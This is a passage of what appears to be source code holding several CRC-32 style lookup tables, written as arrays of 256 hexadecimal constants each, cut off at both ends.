0xade5a817, 0x038d3986, 0x2a458d74, 0x842d1ce5, 0x79d4e490, 0xd7bc7501, 0xfe74c1f3, 0x501c5062, 0xdef63758, 0x709ea6c9, 0x5956123b, 0xf73e83aa, 0x0ac77bdf, 0xa4afea4e, 0x8d675ebc, 0x230fcf2d, 0x72831b0e, 0xdceb8a9f, 0xf5233e6d, 0x5b4baffc, 0xa6b25789, 0x08dac618, 0x211272ea, 0x8f7ae37b, 0x01908441, 0xaff815d0, 0x8630a122, 0x285830b3, 0xd5a1c8c6, 0x7bc95957, 0x5201eda5, 0xfc697c34, 0x94a42590, 0x3accb401, 0x130400f3, 0xbd6c9162, 0x40956917, 0xeefdf886, 0xc7354c74, 0x695ddde5, 0xe7b7badf, 0x49df2b4e, 0x60179fbc, 0xce7f0e2d, 0x3386f658, 0x9dee67c9, 0xb426d33b, 0x1a4e42aa, 0x65bc6073, 0xcbd4f1e2, 0xe21c4510, 0x4c74d481, 0xb18d2cf4, 0x1fe5bd65, 0x362d0997, 0x98459806, 0x16afff3c, 0xb8c76ead, 0x910fda5f, 0x3f674bce, 0xc29eb3bb, 0x6cf6222a, 0x453e96d8, 0xeb560749, 0x839b5eed, 0x2df3cf7c, 0x043b7b8e, 0xaa53ea1f, 0x57aa126a, 0xf9c283fb, 0xd00a3709, 0x7e62a698, 0xf088c1a2, 0x5ee05033, 0x7728e4c1, 0xd9407550, 0x24b98d25, 0x8ad11cb4, 0xa319a846, 0x0d7139d7}, {0x00000000, 0xb9fbdbe8, 0xa886b191, 0x117d6a79, 0x8a7c6563, 0x3387be8b, 0x22fad4f2, 0x9b010f1a, 0xcf89cc87, 0x7672176f, 0x670f7d16, 0xdef4a6fe, 0x45f5a9e4, 0xfc0e720c, 0xed731875, 0x5488c39d, 0x44629f4f, 0xfd9944a7, 0xece42ede, 0x551ff536, 0xce1efa2c, 0x77e521c4, 0x66984bbd, 0xdf639055, 0x8beb53c8, 0x32108820, 0x236de259, 0x9a9639b1, 0x019736ab, 0xb86ced43, 0xa911873a, 0x10ea5cd2, 0x88c53e9e, 0x313ee576, 0x20438f0f, 0x99b854e7, 0x02b95bfd, 0xbb428015, 0xaa3fea6c, 0x13c43184, 0x474cf219, 0xfeb729f1, 0xefca4388, 0x56319860, 0xcd30977a, 0x74cb4c92, 0x65b626eb, 0xdc4dfd03, 0xcca7a1d1, 0x755c7a39, 0x64211040, 0xdddacba8, 0x46dbc4b2, 0xff201f5a, 0xee5d7523, 0x57a6aecb, 0x032e6d56, 0xbad5b6be, 0xaba8dcc7, 0x1253072f, 0x89520835, 0x30a9d3dd, 0x21d4b9a4, 0x982f624c, 0xcafb7b7d, 0x7300a095, 0x627dcaec, 0xdb861104, 0x40871e1e, 0xf97cc5f6, 0xe801af8f, 0x51fa7467, 0x0572b7fa, 0xbc896c12, 0xadf4066b, 0x140fdd83, 0x8f0ed299, 0x36f50971, 0x27886308, 0x9e73b8e0, 0x8e99e432, 0x37623fda, 0x261f55a3, 0x9fe48e4b, 0x04e58151, 0xbd1e5ab9, 0xac6330c0, 0x1598eb28, 0x411028b5, 0xf8ebf35d, 0xe9969924, 0x506d42cc, 0xcb6c4dd6, 0x7297963e, 0x63eafc47, 0xda1127af, 0x423e45e3, 0xfbc59e0b, 0xeab8f472, 0x53432f9a, 0xc8422080, 0x71b9fb68, 0x60c49111, 0xd93f4af9, 0x8db78964, 0x344c528c, 0x253138f5, 0x9ccae31d, 0x07cbec07, 0xbe3037ef, 0xaf4d5d96, 0x16b6867e, 0x065cdaac, 0xbfa70144, 0xaeda6b3d, 0x1721b0d5, 0x8c20bfcf, 0x35db6427, 0x24a60e5e, 0x9d5dd5b6, 0xc9d5162b, 0x702ecdc3, 0x6153a7ba, 0xd8a87c52, 0x43a97348, 0xfa52a8a0, 0xeb2fc2d9, 0x52d41931, 0x4e87f0bb, 0xf77c2b53, 0xe601412a, 0x5ffa9ac2, 0xc4fb95d8, 0x7d004e30, 0x6c7d2449, 0xd586ffa1, 0x810e3c3c, 0x38f5e7d4, 0x29888dad, 0x90735645, 0x0b72595f, 0xb28982b7, 0xa3f4e8ce, 0x1a0f3326, 0x0ae56ff4, 0xb31eb41c, 0xa263de65, 0x1b98058d, 0x80990a97, 0x3962d17f, 0x281fbb06, 0x91e460ee, 0xc56ca373, 0x7c97789b, 0x6dea12e2, 0xd411c90a, 0x4f10c610, 0xf6eb1df8, 0xe7967781, 0x5e6dac69, 0xc642ce25, 0x7fb915cd, 0x6ec47fb4, 0xd73fa45c, 0x4c3eab46, 0xf5c570ae, 0xe4b81ad7, 0x5d43c13f, 0x09cb02a2, 0xb030d94a, 0xa14db333, 0x18b668db, 0x83b767c1, 0x3a4cbc29, 0x2b31d650, 0x92ca0db8, 0x8220516a, 0x3bdb8a82, 0x2aa6e0fb, 0x935d3b13, 0x085c3409, 0xb1a7efe1, 0xa0da8598, 0x19215e70, 0x4da99ded, 0xf4524605, 0xe52f2c7c, 0x5cd4f794, 0xc7d5f88e, 0x7e2e2366, 0x6f53491f, 0xd6a892f7, 0x847c8bc6, 0x3d87502e, 0x2cfa3a57, 0x9501e1bf, 0x0e00eea5, 0xb7fb354d, 0xa6865f34, 0x1f7d84dc, 0x4bf54741, 0xf20e9ca9, 0xe373f6d0, 0x5a882d38, 0xc1892222, 0x7872f9ca, 0x690f93b3, 0xd0f4485b, 0xc01e1489, 0x79e5cf61, 0x6898a518, 0xd1637ef0, 0x4a6271ea, 0xf399aa02, 0xe2e4c07b, 0x5b1f1b93, 0x0f97d80e, 0xb66c03e6, 0xa711699f, 0x1eeab277, 0x85ebbd6d, 0x3c106685, 0x2d6d0cfc, 0x9496d714, 0x0cb9b558, 0xb5426eb0, 0xa43f04c9, 0x1dc4df21, 0x86c5d03b, 0x3f3e0bd3, 0x2e4361aa, 0x97b8ba42, 0xc33079df, 0x7acba237, 0x6bb6c84e, 0xd24d13a6, 0x494c1cbc, 0xf0b7c754, 0xe1caad2d, 0x583176c5, 0x48db2a17, 0xf120f1ff, 0xe05d9b86, 0x59a6406e, 0xc2a74f74, 0x7b5c949c, 0x6a21fee5, 0xd3da250d, 0x8752e690, 0x3ea93d78, 0x2fd45701, 0x962f8ce9, 0x0d2e83f3, 0xb4d5581b, 0xa5a83262, 0x1c53e98a}, {0x00000000, 0x9d0fe176, 0xe16ec4ad, 0x7c6125db, 0x19ac8f1b, 0x84a36e6d, 0xf8c24bb6, 0x65cdaac0, 0x33591e36, 0xae56ff40, 0xd237da9b, 0x4f383bed, 0x2af5912d, 0xb7fa705b, 0xcb9b5580, 0x5694b4f6, 0x66b23c6c, 0xfbbddd1a, 0x87dcf8c1, 0x1ad319b7, 0x7f1eb377, 0xe2115201, 0x9e7077da, 0x037f96ac, 0x55eb225a, 0xc8e4c32c, 0xb485e6f7, 0x298a0781, 0x4c47ad41, 0xd1484c37, 0xad2969ec, 0x3026889a, 0xcd6478d8, 0x506b99ae, 0x2c0abc75, 0xb1055d03, 0xd4c8f7c3, 0x49c716b5, 0x35a6336e, 0xa8a9d218, 0xfe3d66ee, 0x63328798, 0x1f53a243, 0x825c4335, 0xe791e9f5, 0x7a9e0883, 0x06ff2d58, 0x9bf0cc2e, 0xabd644b4, 0x36d9a5c2, 0x4ab88019, 0xd7b7616f, 0xb27acbaf, 0x2f752ad9, 0x53140f02, 0xce1bee74, 0x988f5a82, 0x0580bbf4, 0x79e19e2f, 0xe4ee7f59, 0x8123d599, 0x1c2c34ef, 0x604d1134, 0xfd42f042, 0x41b9f7f1, 0xdcb61687, 0xa0d7335c, 0x3dd8d22a, 0x581578ea, 0xc51a999c, 0xb97bbc47, 0x24745d31, 0x72e0e9c7, 0xefef08b1, 0x938e2d6a, 0x0e81cc1c, 0x6b4c66dc, 0xf64387aa, 0x8a22a271, 0x172d4307, 0x270bcb9d, 0xba042aeb, 0xc6650f30, 0x5b6aee46, 0x3ea74486, 0xa3a8a5f0, 0xdfc9802b, 0x42c6615d, 0x1452d5ab, 0x895d34dd, 0xf53c1106, 0x6833f070, 0x0dfe5ab0, 0x90f1bbc6, 0xec909e1d, 0x719f7f6b, 0x8cdd8f29, 0x11d26e5f, 0x6db34b84, 0xf0bcaaf2, 0x95710032, 0x087ee144, 0x741fc49f, 0xe91025e9, 0xbf84911f, 0x228b7069, 0x5eea55b2, 0xc3e5b4c4, 0xa6281e04, 0x3b27ff72, 0x4746daa9, 0xda493bdf, 0xea6fb345, 0x77605233, 0x0b0177e8, 0x960e969e, 0xf3c33c5e, 0x6eccdd28, 0x12adf8f3, 0x8fa21985, 0xd936ad73, 0x44394c05, 0x385869de, 0xa55788a8, 0xc09a2268, 0x5d95c31e, 0x21f4e6c5, 0xbcfb07b3, 0x8373efe2, 0x1e7c0e94, 0x621d2b4f, 0xff12ca39, 0x9adf60f9, 0x07d0818f, 0x7bb1a454, 0xe6be4522, 0xb02af1d4, 0x2d2510a2, 0x51443579, 0xcc4bd40f, 0xa9867ecf, 0x34899fb9, 0x48e8ba62, 0xd5e75b14, 0xe5c1d38e, 0x78ce32f8, 0x04af1723, 0x99a0f655, 0xfc6d5c95, 0x6162bde3, 0x1d039838, 0x800c794e, 0xd698cdb8, 0x4b972cce, 0x37f60915, 0xaaf9e863, 0xcf3442a3, 0x523ba3d5, 0x2e5a860e, 0xb3556778, 0x4e17973a, 0xd318764c, 0xaf795397, 0x3276b2e1, 0x57bb1821, 0xcab4f957, 0xb6d5dc8c, 0x2bda3dfa, 0x7d4e890c, 0xe041687a, 0x9c204da1, 0x012facd7, 0x64e20617, 0xf9ede761, 0x858cc2ba, 0x188323cc, 0x28a5ab56, 0xb5aa4a20, 0xc9cb6ffb, 0x54c48e8d, 0x3109244d, 0xac06c53b, 0xd067e0e0, 0x4d680196, 0x1bfcb560, 0x86f35416, 0xfa9271cd, 0x679d90bb, 0x02503a7b, 0x9f5fdb0d, 0xe33efed6, 0x7e311fa0, 0xc2ca1813, 0x5fc5f965, 0x23a4dcbe, 0xbeab3dc8, 0xdb669708, 0x4669767e, 0x3a0853a5, 0xa707b2d3, 0xf1930625, 0x6c9ce753, 0x10fdc288, 0x8df223fe, 0xe83f893e, 0x75306848, 0x09514d93, 0x945eace5, 0xa478247f, 0x3977c509, 0x4516e0d2, 0xd81901a4, 0xbdd4ab64, 0x20db4a12, 0x5cba6fc9, 0xc1b58ebf, 0x97213a49, 0x0a2edb3f, 0x764ffee4, 0xeb401f92, 0x8e8db552, 0x13825424, 0x6fe371ff, 0xf2ec9089, 0x0fae60cb, 0x92a181bd, 0xeec0a466, 0x73cf4510, 0x1602efd0, 0x8b0d0ea6, 0xf76c2b7d, 0x6a63ca0b, 0x3cf77efd, 0xa1f89f8b, 0xdd99ba50, 0x40965b26, 0x255bf1e6, 0xb8541090, 0xc435354b, 0x593ad43d, 0x691c5ca7, 0xf413bdd1, 0x8872980a, 0x157d797c, 0x70b0d3bc, 0xedbf32ca, 0x91de1711, 0x0cd1f667, 0x5a454291, 0xc74aa3e7, 0xbb2b863c, 0x2624674a, 0x43e9cd8a, 0xdee62cfc, 0xa2870927, 0x3f88e851}, {0x00000000, 0xdd96d985, 0x605cb54b, 0xbdca6cce, 0xc0b96a96, 0x1d2fb313, 0xa0e5dfdd, 0x7d730658, 0x5a03d36d, 0x87950ae8, 0x3a5f6626, 0xe7c9bfa3, 0x9abab9fb, 0x472c607e, 0xfae60cb0, 0x2770d535, 0xb407a6da, 0x69917f5f, 0xd45b1391, 0x09cdca14, 0x74becc4c, 0xa92815c9, 0x14e27907, 0xc974a082, 0xee0475b7, 0x3392ac32, 0x8e58c0fc, 0x53ce1979, 0x2ebd1f21, 0xf32bc6a4, 0x4ee1aa6a, 0x937773ef, 0xb37e4bf5, 0x6ee89270, 0xd322febe, 0x0eb4273b, 0x73c72163, 0xae51f8e6, 0x139b9428, 0xce0d4dad, 0xe97d9898, 0x34eb411d, 0x89212dd3, 0x54b7f456, 0x29c4f20e, 0xf4522b8b, 0x49984745, 0x940e9ec0, 0x0779ed2f, 0xdaef34aa, 0x67255864, 0xbab381e1, 0xc7c087b9, 0x1a565e3c, 0xa79c32f2, 0x7a0aeb77, 0x5d7a3e42, 0x80ece7c7, 0x3d268b09, 0xe0b0528c, 0x9dc354d4, 0x40558d51, 0xfd9fe19f, 0x2009381a, 0xbd8d91ab, 0x601b482e, 0xddd124e0, 0x0047fd65, 0x7d34fb3d, 0xa0a222b8, 0x1d684e76, 0xc0fe97f3, 0xe78e42c6, 0x3a189b43, 0x87d2f78d, 0x5a442e08, 0x27372850, 0xfaa1f1d5, 0x476b9d1b, 0x9afd449e, 0x098a3771, 0xd41ceef4, 0x69d6823a, 0xb4405bbf, 0xc9335de7, 0x14a58462, 0xa96fe8ac, 0x74f93129, 0x5389e41c, 0x8e1f3d99, 0x33d55157, 0xee4388d2, 0x93308e8a, 0x4ea6570f, 0xf36c3bc1, 0x2efae244, 0x0ef3da5e, 0xd36503db, 0x6eaf6f15, 0xb339b690, 0xce4ab0c8, 0x13dc694d, 0xae160583, 0x7380dc06, 0x54f00933, 0x8966d0b6, 0x34acbc78, 0xe93a65fd, 0x944963a5, 0x49dfba20, 0xf415d6ee, 0x29830f6b, 0xbaf47c84, 0x6762a501, 0xdaa8c9cf, 0x073e104a, 0x7a4d1612, 0xa7dbcf97, 0x1a11a359, 0xc7877adc, 0xe0f7afe9, 0x3d61766c, 0x80ab1aa2, 0x5d3dc327, 0x204ec57f, 0xfdd81cfa, 0x40127034, 0x9d84a9b1, 0xa06a2517, 0x7dfcfc92, 0xc036905c, 0x1da049d9, 0x60d34f81, 0xbd459604, 0x008ffaca, 0xdd19234f, 0xfa69f67a, 0x27ff2fff, 0x9a354331, 0x47a39ab4, 0x3ad09cec, 0xe7464569, 0x5a8c29a7, 0x871af022, 0x146d83cd, 0xc9fb5a48, 0x74313686, 0xa9a7ef03, 0xd4d4e95b, 0x094230de, 0xb4885c10, 0x691e8595, 0x4e6e50a0, 0x93f88925, 0x2e32e5eb, 0xf3a43c6e, 0x8ed73a36, 0x5341e3b3, 0xee8b8f7d, 0x331d56f8, 0x13146ee2, 0xce82b767, 0x7348dba9, 0xaede022c, 0xd3ad0474, 0x0e3bddf1, 0xb3f1b13f, 0x6e6768ba, 0x4917bd8f, 0x9481640a, 0x294b08c4, 0xf4ddd141, 0x89aed719, 0x54380e9c, 0xe9f26252, 0x3464bbd7, 0xa713c838, 0x7a8511bd, 0xc74f7d73, 0x1ad9a4f6, 0x67aaa2ae, 0xba3c7b2b, 0x07f617e5, 0xda60ce60, 0xfd101b55, 0x2086c2d0, 0x9d4cae1e, 0x40da779b, 0x3da971c3, 0xe03fa846, 0x5df5c488, 0x80631d0d, 0x1de7b4bc, 0xc0716d39, 0x7dbb01f7, 0xa02dd872, 0xdd5ede2a, 0x00c807af, 0xbd026b61, 0x6094b2e4, 0x47e467d1, 0x9a72be54, 0x27b8d29a, 0xfa2e0b1f, 0x875d0d47, 0x5acbd4c2, 0xe701b80c, 0x3a976189, 0xa9e01266, 0x7476cbe3, 0xc9bca72d, 0x142a7ea8, 0x695978f0, 0xb4cfa175, 0x0905cdbb, 0xd493143e, 0xf3e3c10b, 0x2e75188e, 0x93bf7440, 0x4e29adc5, 0x335aab9d, 0xeecc7218, 0x53061ed6, 0x8e90c753, 0xae99ff49, 0x730f26cc, 0xcec54a02, 0x13539387, 0x6e2095df, 0xb3b64c5a, 0x0e7c2094, 0xd3eaf911, 0xf49a2c24, 0x290cf5a1, 0x94c6996f, 0x495040ea, 0x342346b2, 0xe9b59f37, 0x547ff3f9, 0x89e92a7c, 0x1a9e5993, 0xc7088016, 0x7ac2ecd8, 0xa754355d, 0xda273305, 0x07b1ea80, 0xba7b864e, 0x67ed5fcb, 0x409d8afe, 0x9d0b537b, 0x20c13fb5, 0xfd57e630, 0x8024e068, 0x5db239ed, 0xe0785523, 0x3dee8ca6}, {0x00000000, 0x9ba54c6f, 0xec3b9e9f, 0x779ed2f0, 0x03063b7f, 0x98a37710, 0xef3da5e0, 0x7498e98f, 0x060c76fe, 0x9da93a91, 0xea37e861, 0x7192a40e, 0x050a4d81, 0x9eaf01ee, 0xe931d31e, 0x72949f71, 0x0c18edfc, 0x97bda193, 0xe0237363, 0x7b863f0c, 0x0f1ed683, 0x94bb9aec, 0xe325481c, 0x78800473, 0x0a149b02, 0x91b1d76d, 0xe62f059d, 0x7d8a49f2, 0x0912a07d, 0x92b7ec12, 0xe5293ee2, 0x7e8c728d, 0x1831dbf8, 0x83949797, 0xf40a4567, 0x6faf0908, 0x1b37e087, 0x8092ace8, 0xf70c7e18, 0x6ca93277, 0x1e3dad06, 0x8598e169, 0xf2063399, 0x69a37ff6, 0x1d3b9679, 0x869eda16, 0xf10008e6, 0x6aa54489, 0x14293604, 0x8f8c7a6b, 0xf812a89b, 0x63b7e4f4, 0x172f0d7b, 0x8c8a4114, 0xfb1493e4, 0x60b1df8b, 0x122540fa, 0x89800c95, 0xfe1ede65, 0x65bb920a, 0x11237b85, 0x8a8637ea, 0xfd18e51a, 0x66bda975, 0x3063b7f0, 0xabc6fb9f, 0xdc58296f, 0x47fd6500, 0x33658c8f, 0xa8c0c0e0, 0xdf5e1210, 0x44fb5e7f, 0x366fc10e, 0xadca8d61, 0xda545f91, 0x41f113fe, 0x3569fa71, 0xaeccb61e, 0xd95264ee, 0x42f72881, 0x3c7b5a0c, 0xa7de1663, 0xd040c493, 0x4be588fc, 0x3f7d6173, 0xa4d82d1c, 0xd346ffec, 0x48e3b383, 0x3a772cf2, 0xa1d2609d, 0xd64cb26d, 0x4de9fe02, 0x3971178d, 0xa2d45be2, 0xd54a8912, 0x4eefc57d, 0x28526c08, 0xb3f72067, 0xc469f297, 0x5fccbef8, 0x2b545777, 0xb0f11b18, 0xc76fc9e8, 0x5cca8587, 0x2e5e1af6, 0xb5fb5699, 0xc2658469, 0x59c0c806, 0x2d582189, 0xb6fd6de6, 0xc163bf16, 0x5ac6f379, 0x244a81f4, 0xbfefcd9b, 0xc8711f6b, 0x53d45304, 0x274cba8b, 0xbce9f6e4, 0xcb772414, 0x50d2687b, 0x2246f70a, 0xb9e3bb65, 0xce7d6995, 0x55d825fa, 0x2140cc75, 0xbae5801a, 0xcd7b52ea, 0x56de1e85, 0x60c76fe0, 0xfb62238f, 0x8cfcf17f, 0x1759bd10, 0x63c1549f, 0xf86418f0, 0x8ffaca00, 0x145f866f, 0x66cb191e, 0xfd6e5571, 0x8af08781, 0x1155cbee, 0x65cd2261, 0xfe686e0e, 0x89f6bcfe, 0x1253f091, 0x6cdf821c, 0xf77ace73, 0x80e41c83, 0x1b4150ec, 0x6fd9b963, 0xf47cf50c, 0x83e227fc, 0x18476b93, 0x6ad3f4e2, 0xf176b88d, 0x86e86a7d, 0x1d4d2612, 0x69d5cf9d, 0xf27083f2, 0x85ee5102, 0x1e4b1d6d, 0x78f6b418, 0xe353f877, 0x94cd2a87, 0x0f6866e8, 0x7bf08f67, 0xe055c308, 0x97cb11f8, 0x0c6e5d97, 0x7efac2e6, 0xe55f8e89, 0x92c15c79, 0x09641016, 0x7dfcf999, 0xe659b5f6, 0x91c76706, 0x0a622b69, 0x74ee59e4, 0xef4b158b, 0x98d5c77b, 0x03708b14, 0x77e8629b, 0xec4d2ef4, 0x9bd3fc04, 0x0076b06b, 0x72e22f1a, 0xe9476375, 0x9ed9b185, 0x057cfdea, 0x71e41465, 0xea41580a, 0x9ddf8afa, 0x067ac695, 0x50a4d810, 0xcb01947f, 0xbc9f468f, 0x273a0ae0, 0x53a2e36f, 0xc807af00, 0xbf997df0, 0x243c319f, 0x56a8aeee, 0xcd0de281, 0xba933071, 0x21367c1e, 0x55ae9591, 0xce0bd9fe, 0xb9950b0e, 0x22304761, 0x5cbc35ec, 0xc7197983, 0xb087ab73, 0x2b22e71c, 0x5fba0e93, 0xc41f42fc, 0xb381900c, 0x2824dc63, 0x5ab04312, 0xc1150f7d, 0xb68bdd8d, 0x2d2e91e2, 0x59b6786d, 0xc2133402, 0xb58de6f2, 0x2e28aa9d, 0x489503e8, 0xd3304f87, 0xa4ae9d77, 0x3f0bd118, 0x4b933897, 0xd03674f8, 0xa7a8a608, 0x3c0dea67, 0x4e997516, 0xd53c3979, 0xa2a2eb89, 0x3907a7e6, 0x4d9f4e69, 0xd63a0206, 0xa1a4d0f6, 0x3a019c99, 0x448dee14, 0xdf28a27b, 0xa8b6708b, 0x33133ce4, 0x478bd56b, 0xdc2e9904, 0xabb04bf4, 0x3015079b, 0x428198ea, 0xd924d485, 0xaeba0675, 0x351f4a1a, 0x4187a395, 0xda22effa, 0xadbc3d0a, 0x36197165}, {0x00000000, 0xc18edfc0, 0x586cb9c1, 0x99e26601, 0xb0d97382, 0x7157ac42, 0xe8b5ca43, 0x293b1583, 0xbac3e145, 0x7b4d3e85, 0xe2af5884, 0x23218744, 0x0a1a92c7, 0xcb944d07, 0x52762b06, 0x93f8f4c6, 0xaef6c4cb, 0x6f781b0b, 0xf69a7d0a, 0x3714a2ca, 0x1e2fb749, 0xdfa16889, 0x46430e88, 0x87cdd148, 0x1435258e, 0xd5bbfa4e, 0x4c599c4f, 0x8dd7438f, 0xa4ec560c, 0x656289cc, 0xfc80efcd, 0x3d0e300d, 0x869c8fd7, 0x47125017, 0xdef03616, 0x1f7ee9d6, 0x3645fc55, 0xf7cb2395, 0x6e294594, 0xafa79a54, 0x3c5f6e92, 0xfdd1b152, 0x6433d753, 0xa5bd0893, 0x8c861d10, 0x4d08c2d0, 0xd4eaa4d1, 0x15647b11, 0x286a4b1c, 0xe9e494dc, 0x7006f2dd, 0xb1882d1d, 0x98b3389e, 0x593de75e, 0xc0df815f, 0x01515e9f, 0x92a9aa59, 0x53277599, 0xcac51398, 0x0b4bcc58, 0x2270d9db, 0xe3fe061b, 0x7a1c601a, 0xbb92bfda, 0xd64819ef, 0x17c6c62f, 0x8e24a02e, 0x4faa7fee, 0x66916a6d, 0xa71fb5ad, 0x3efdd3ac, 0xff730c6c, 0x6c8bf8aa, 0xad05276a, 0x34e7416b, 0xf5699eab, 0xdc528b28, 0x1ddc54e8, 0x843e32e9, 0x45b0ed29, 0x78bedd24, 0xb93002e4, 0x20d264e5, 0xe15cbb25, 0xc867aea6, 0x09e97166, 0x900b1767, 0x5185c8a7, 0xc27d3c61, 0x03f3e3a1, 0x9a1185a0, 0x5b9f5a60, 0x72a44fe3, 0xb32a9023, 0x2ac8f622, 0xeb4629e2, 0x50d49638, 0x915a49f8, 0x08b82ff9, 0xc936f039, 0xe00de5ba, 0x21833a7a, 0xb8615c7b, 0x79ef83bb, 0xea17777d, 0x2b99a8bd, 0xb27bcebc, 0x73f5117c, 0x5ace04ff, 0x9b40db3f, 0x02a2bd3e, 0xc32c62fe, 0xfe2252f3, 0x3fac8d33, 0xa64eeb32, 0x67c034f2, 0x4efb2171, 0x8f75feb1, 0x169798b0, 0xd7194770, 0x44e1b3b6, 0x856f6c76, 0x1c8d0a77, 0xdd03d5b7, 0xf438c034, 0x35b61ff4, 0xac5479f5, 0x6ddaa635, 0x77e1359f, 0xb66fea5f, 0x2f8d8c5e, 0xee03539e, 0xc738461d, 0x06b699dd, 0x9f54ffdc, 0x5eda201c, 0xcd22d4da, 0x0cac0b1a, 0x954e6d1b, 0x54c0b2db, 0x7dfba758, 0xbc757898, 0x25971e99, 0xe419c159, 0xd917f154, 0x18992e94, 0x817b4895, 0x40f59755, 0x69ce82d6, 0xa8405d16, 0x31a23b17, 0xf02ce4d7, 0x63d41011, 0xa25acfd1, 0x3bb8a9d0, 0xfa367610, 0xd30d6393, 0x1283bc53, 0x8b61da52, 0x4aef0592, 0xf17dba48, 0x30f36588, 0xa9110389, 0x689fdc49, 0x41a4c9ca, 0x802a160a, 0x19c8700b, 0xd846afcb, 0x4bbe5b0d, 0x8a3084cd, 0x13d2e2cc, 0xd25c3d0c, 0xfb67288f, 0x3ae9f74f, 0xa30b914e, 0x62854e8e, 0x5f8b7e83, 0x9e05a143, 0x07e7c742, 0xc6691882, 0xef520d01, 0x2edcd2c1, 0xb73eb4c0, 0x76b06b00, 0xe5489fc6, 0x24c64006, 0xbd242607, 0x7caaf9c7, 0x5591ec44, 0x941f3384, 0x0dfd5585, 0xcc738a45, 0xa1a92c70, 0x6027f3b0, 0xf9c595b1, 0x384b4a71, 0x11705ff2, 0xd0fe8032, 0x491ce633, 0x889239f3, 0x1b6acd35, 0xdae412f5, 0x430674f4, 0x8288ab34, 0xabb3beb7, 0x6a3d6177, 0xf3df0776, 0x3251d8b6, 0x0f5fe8bb, 0xced1377b, 0x5733517a, 0x96bd8eba, 0xbf869b39, 0x7e0844f9, 0xe7ea22f8, 0x2664fd38, 0xb59c09fe, 0x7412d63e, 0xedf0b03f, 0x2c7e6fff, 0x05457a7c, 0xc4cba5bc, 0x5d29c3bd, 0x9ca71c7d, 0x2735a3a7, 0xe6bb7c67, 0x7f591a66, 0xbed7c5a6, 0x97ecd025, 0x56620fe5, 0xcf8069e4, 0x0e0eb624, 0x9df642e2, 0x5c789d22, 0xc59afb23, 0x041424e3, 0x2d2f3160, 0xeca1eea0, 0x754388a1, 0xb4cd5761, 0x89c3676c, 0x484db8ac, 0xd1afdead, 0x1021016d, 0x391a14ee, 0xf894cb2e, 0x6176ad2f, 0xa0f872ef, 0x33008629, 0xf28e59e9, 0x6b6c3fe8, 0xaae2e028, 0x83d9f5ab, 0x42572a6b, 0xdbb54c6a, 0x1a3b93aa}, {0x00000000, 0xefc26b3e, 0x04f5d03d, 0xeb37bb03, 0x09eba07a, 0xe629cb44, 0x0d1e7047, 0xe2dc1b79, 0x13d740f4, 0xfc152bca, 0x172290c9, 0xf8e0fbf7, 0x1a3ce08e, 0xf5fe8bb0, 0x1ec930b3, 0xf10b5b8d, 0x27ae81e8, 0xc86cead6, 0x235b51d5, 0xcc993aeb, 0x2e452192, 0xc1874aac, 0x2ab0f1af, 0xc5729a91, 0x3479c11c, 0xdbbbaa22, 0x308c1121, 0xdf4e7a1f, 0x3d926166, 0xd2500a58, 0x3967b15b, 0xd6a5da65, 0x4f5d03d0, 0xa09f68ee, 0x4ba8d3ed, 0xa46ab8d3, 0x46b6a3aa, 0xa974c894, 0x42437397, 0xad8118a9, 0x5c8a4324, 0xb348281a, 0x587f9319, 0xb7bdf827, 0x5561e35e, 0xbaa38860, 0x51943363, 0xbe56585d, 0x68f38238, 0x8731e906, 0x6c065205, 0x83c4393b, 0x61182242, 0x8eda497c, 0x65edf27f, 0x8a2f9941, 0x7b24c2cc, 0x94e6a9f2, 0x7fd112f1, 0x901379cf, 0x72cf62b6, 0x9d0d0988, 0x763ab28b, 0x99f8d9b5, 0x9eba07a0, 0x71786c9e, 0x9a4fd79d, 0x758dbca3, 0x9751a7da, 0x7893cce4, 0x93a477e7, 0x7c661cd9, 0x8d6d4754, 0x62af2c6a, 0x89989769, 0x665afc57, 0x8486e72e, 0x6b448c10, 0x80733713, 0x6fb15c2d, 0xb9148648, 0x56d6ed76, 0xbde15675, 0x52233d4b, 0xb0ff2632, 0x5f3d4d0c, 0xb40af60f, 0x5bc89d31, 0xaac3c6bc, 0x4501ad82, 0xae361681, 0x41f47dbf, 0xa32866c6, 0x4cea0df8, 0xa7ddb6fb, 0x481fddc5, 0xd1e70470, 0x3e256f4e, 0xd512d44d, 0x3ad0bf73, 0xd80ca40a, 0x37cecf34, 0xdcf97437, 0x333b1f09, 0xc2304484, 0x2df22fba, 0xc6c594b9, 0x2907ff87, 0xcbdbe4fe, 0x24198fc0, 0xcf2e34c3, 0x20ec5ffd, 0xf6498598, 0x198beea6, 0xf2bc55a5, 0x1d7e3e9b, 0xffa225e2, 0x10604edc, 0xfb57f5df, 0x14959ee1, 0xe59ec56c, 0x0a5cae52, 0xe16b1551, 0x0ea97e6f, 0xec756516, 0x03b70e28, 0xe880b52b, 0x0742de15, 0xe6050901, 0x09c7623f, 0xe2f0d93c, 0x0d32b202, 0xefeea97b, 0x002cc245, 0xeb1b7946, 0x04d91278, 0xf5d249f5, 0x1a1022cb, 0xf12799c8, 0x1ee5f2f6, 0xfc39e98f, 0x13fb82b1, 0xf8cc39b2, 0x170e528c, 0xc1ab88e9, 0x2e69e3d7, 0xc55e58d4, 0x2a9c33ea, 0xc8402893, 0x278243ad, 0xccb5f8ae, 0x23779390, 0xd27cc81d, 0x3dbea323, 0xd6891820, 0x394b731e, 0xdb976867, 0x34550359, 0xdf62b85a, 0x30a0d364, 0xa9580ad1, 0x469a61ef, 0xadaddaec, 0x426fb1d2, 0xa0b3aaab, 0x4f71c195, 0xa4467a96, 0x4b8411a8, 0xba8f4a25, 0x554d211b, 0xbe7a9a18, 0x51b8f126, 0xb364ea5f, 0x5ca68161, 0xb7913a62, 0x5853515c, 0x8ef68b39, 0x6134e007, 0x8a035b04, 0x65c1303a, 0x871d2b43, 0x68df407d, 0x83e8fb7e, 0x6c2a9040, 0x9d21cbcd, 0x72e3a0f3, 0x99d41bf0, 0x761670ce, 0x94ca6bb7, 0x7b080089, 0x903fbb8a, 0x7ffdd0b4, 0x78bf0ea1, 0x977d659f, 0x7c4ade9c, 0x9388b5a2, 0x7154aedb, 0x9e96c5e5, 0x75a17ee6, 0x9a6315d8, 0x6b684e55, 0x84aa256b, 0x6f9d9e68, 0x805ff556, 0x6283ee2f, 0x8d418511, 0x66763e12, 0x89b4552c, 0x5f118f49, 0xb0d3e477, 0x5be45f74, 0xb426344a, 0x56fa2f33, 0xb938440d, 0x520fff0e, 0xbdcd9430, 0x4cc6cfbd, 0xa304a483, 0x48331f80, 0xa7f174be, 0x452d6fc7, 0xaaef04f9, 0x41d8bffa, 0xae1ad4c4, 0x37e20d71, 0xd820664f, 0x3317dd4c, 0xdcd5b672, 